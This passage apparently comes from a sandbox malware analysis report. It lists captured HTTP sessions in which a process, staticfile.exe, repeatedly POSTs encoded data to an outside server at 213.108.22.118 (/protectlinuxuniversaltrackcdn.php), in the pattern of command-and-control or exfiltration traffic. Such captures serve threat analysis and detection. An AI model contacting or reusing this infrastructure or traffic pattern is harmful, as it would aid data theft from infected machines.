                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 33 30 20 4e 6f 76 20 32 30 32 34 20 32 31 3a 33 36 3a 30 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 31 59 5a 51
                                        Data Ascii: HTTP/1.1 200 OKDate: Sat, 30 Nov 2024 21:36:05 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 4Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-81YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.2.449750213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:06.288997889 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:06.639269114 CET2544OUTData Raw: 55 5f 59 54 55 59 50 5b 55 5c 57 59 50 53 5a 5c 58 5c 5b 58 51 50 53 5c 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U_YTUYP[U\WYPSZ\X\[XQPS\U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+97<]%$\;4%; T%-/_)X#/:3.?1 %:._/%^/


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        15192.168.2.449751213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:06.933991909 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:07.278516054 CET1428OUTData Raw: 55 59 59 5d 55 5c 55 58 55 5c 57 59 50 5f 5a 52 58 59 5b 52 51 51 53 5c 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UYY]U\UXU\WYP_ZRXY[RQQS\U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"?>: "(X2>/,%(0=?[)/#1'>#[13:X.._/%^/0
                                        Nov 30, 2024 22:36:08.420058966 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:08.678127050 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:08 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 20 04 2b 16 00 5a 3c 06 07 59 2d 59 24 57 31 01 2e 01 2c 04 31 5d 29 39 3a 03 2a 2f 32 0a 23 38 3b 10 3f 00 36 1d 30 50 21 04 2b 3b 2b 5e 0c 1b 23 1a 3c 15 3d 5c 24 05 28 16 27 33 34 5f 36 1f 28 03 30 3d 3a 54 3c 2b 3d 06 34 31 07 0a 2f 32 2a 0c 26 3a 24 5b 2a 11 20 0c 22 29 2f 56 0b 12 21 0f 26 21 3d 5e 26 3f 01 03 23 23 3d 00 23 35 22 58 34 2f 00 0b 22 38 0c 58 28 2e 2a 1c 20 0d 0e 19 3d 03 03 58 26 31 34 09 2a 2d 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: +Z<Y-Y$W1.,1])9:*/2#8;?60P!+;+^#<=\$('34_6(0=:T<+=41/2*&:$[* ")/V!&!=^&?##=#5"X4/"8X(.* =X&14*-/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        16192.168.2.449752213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:07.054213047 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:07.407320976 CET2544OUTData Raw: 50 59 59 5f 55 5e 50 50 55 5c 57 59 50 5f 5a 53 58 5d 5b 5b 51 5d 53 55 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PYY_U^PPU\WYP_ZSX][[Q]SUU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+.! !;$>/#1+(R'=4)? ,%S0> 106^-4._/%^/0
                                        Nov 30, 2024 22:36:08.383830070 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:09.366926908 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:08 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        17192.168.2.449753213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:09.618684053 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:36:09.965872049 CET2544OUTData Raw: 55 5f 5c 5a 50 5e 50 5d 55 5c 57 59 50 5e 5a 53 58 55 5b 53 51 5d 53 5e 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U_\ZP^P]U\WYP^ZSXU[SQ]S^U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"*=6\##&.8#U288T0-;Y)5("/:0>$%!9._/%^/4


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        18192.168.2.449754213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:13.822396994 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:14.171077013 CET1428OUTData Raw: 55 51 59 5c 50 5e 50 5c 55 5c 57 59 50 58 5a 52 58 5c 5b 5f 51 5d 53 5a 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UQY\P^P\U\WYPXZRX\[_Q]SZU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!(>4"\& ,3$(<%> *&<#?$/26[.._/%^/,
                                        Nov 30, 2024 22:36:15.237206936 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:16.239902020 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:14 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 20 07 28 38 00 11 3f 16 25 5d 2c 2f 30 51 25 5e 39 1d 2d 3d 39 5e 3c 04 26 02 3d 05 2e 0b 22 2b 33 10 3c 3a 21 0d 26 35 35 05 3f 3b 2b 5e 0c 1b 20 09 2b 28 2d 5e 33 28 2f 00 24 1e 24 5e 21 31 3f 5e 30 3d 07 0d 2b 38 2a 5f 23 31 0f 09 38 31 35 53 31 17 0e 13 29 06 3f 53 35 39 2f 56 0b 12 21 0f 30 0c 2a 01 25 01 0e 1f 37 1e 26 17 21 36 22 12 37 3f 08 0d 22 28 03 05 2b 10 25 07 37 1d 2c 57 28 2d 2e 01 26 22 34 08 29 3d 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: (8?%],/0Q%^9-=9^<&=."+3<:!&55?;+^ +(-^3(/$$^!1?^0=+8*_#1815S1)?S59/V!0*%7&!6"7?"(+%7,W(-.&"4)=/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        19192.168.2.449755213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:14.194632053 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:14.544161081 CET2544OUTData Raw: 55 5b 59 55 55 5c 55 58 55 5c 57 59 50 5a 5a 52 58 5d 5b 5b 51 5f 53 5f 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U[YUU\UXU\WYPZZRX][[Q_S_U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!D<>Y7$$>-,#U%33[;>;"/1V&>810:-4._/%^/$
                                        Nov 30, 2024 22:36:15.548561096 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:15.789858103 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:15 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        20192.168.2.449756213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:16.038217068 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:36:16.388144016 CET2544OUTData Raw: 55 59 59 59 50 5d 50 51 55 5c 57 59 50 52 5a 56 58 5e 5b 53 51 5c 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UYYYP]PQU\WYPRZVX^[SQ\SXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+72+2;?<$84R3 );71'[$&#,4._/%^/
                                        Nov 30, 2024 22:36:17.514615059 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:18.554663897 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:17 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        21192.168.2.449757213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:18.805634975 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:36:19.153520107 CET2544OUTData Raw: 50 5e 59 58 55 5b 55 5b 55 5c 57 59 50 5f 5a 51 58 5c 5b 58 51 5a 53 5a 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P^YXU[U[U\WYP_ZQX\[XQZSZU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!C*=%4<_2> [/0288S%-'=%4<-W3+]%"Z:4._/%^/0
                                        Nov 30, 2024 22:36:20.208939075 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:20.470192909 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:19 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        22192.168.2.449758213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:20.727616072 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:21.075408936 CET2544OUTData Raw: 55 5c 5c 58 55 5e 50 5a 55 5c 57 59 50 5e 5a 55 58 58 5b 52 51 5d 53 59 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U\\XU^PZU\WYP^ZUXX[RQ]SYU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"?-6\7T X%>,31#0(5+]4U'+&!,4._/%^/4


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        23192.168.2.449759213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:21.368422985 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:21.716010094 CET1428OUTData Raw: 50 59 59 55 55 5f 55 5b 55 5c 57 59 50 5d 5a 54 58 58 5b 59 51 5e 53 55 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PYYUU_U[U\WYP]ZTXX[YQ^SUU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"(X*\!2$\%-? &+3[(%$"/*'>#2^,$._/%^/8
                                        Nov 30, 2024 22:36:22.741178036 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:22.982412100 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:22 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 23 1b 28 3b 32 10 28 5e 36 05 2e 11 30 13 25 16 21 59 38 2d 29 16 3f 3a 31 59 29 2f 25 1f 21 28 05 58 28 29 29 0b 24 18 22 1f 28 01 2b 5e 0c 1b 20 44 3c 02 3d 5e 30 38 38 5f 30 30 33 07 22 1f 37 5f 26 3d 3a 53 3f 01 26 59 20 21 31 08 38 0c 21 57 32 39 24 5a 29 3c 3c 0b 21 39 2f 56 0b 12 21 08 30 1c 35 5f 31 2f 24 5a 23 1e 2a 5f 23 26 22 5c 23 59 22 0c 21 5e 2d 00 28 3d 32 11 20 0d 20 56 3e 13 32 02 31 32 24 0c 29 07 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: #(;2(^6.0%!Y8-)?:1Y)/%!(X())$"(+^ D<=^088_003"7_&=:S?&Y !18!W29$Z)<<!9/V!05_1/$Z#*_#&"\#Y"!^-(=2 V>212$)/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        24192.168.2.449760213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:21.492160082 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:21.841487885 CET2544OUTData Raw: 50 5c 5c 5a 50 5e 50 58 55 5c 57 59 50 53 5a 53 58 5d 5b 5c 51 51 53 54 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P\\ZP^PXU\WYPSZSX][\QQSTU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"<X6\ "0\%/<7V1<T3>#Z*6?[4?*$81 &[9$._/%^/
                                        Nov 30, 2024 22:36:23.198532104 CET232INHTTP/1.1 100 Continue
                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 33 30 20 4e 6f 76 20 32 30 32 34 20 32 31 3a 33 36 3a 32 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 31 59 5a 51
                                        Data Ascii: HTTP/1.1 200 OKDate: Sat, 30 Nov 2024 21:36:22 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 4Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-81YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        25192.168.2.449761213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:23.450139046 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:36:23.794226885 CET2544OUTData Raw: 55 59 5c 5e 55 59 50 59 55 5c 57 59 50 5a 5a 52 58 55 5b 5e 51 5a 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UY\^UYPYU\WYPZZRXU[^QZSXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!B("\7#1>;&+ '=(>$72'/$#>^,4._/%^/$
                                        Nov 30, 2024 22:36:24.940658092 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:25.521214962 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:24 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        26192.168.2.449764213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:25.970225096 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:26.325414896 CET2544OUTData Raw: 50 5b 5c 59 55 5a 55 5d 55 5c 57 59 50 52 5a 57 58 54 5b 59 51 5b 53 54 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P[\YUZU]U\WYPRZWXT[YQ[STU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+:X "^&-;/<7T1; ''(5( :37$#9.$._/%^/
                                        Nov 30, 2024 22:36:27.404099941 CET25INHTTP/1.1 100 Continue


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        27192.168.2.449770213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
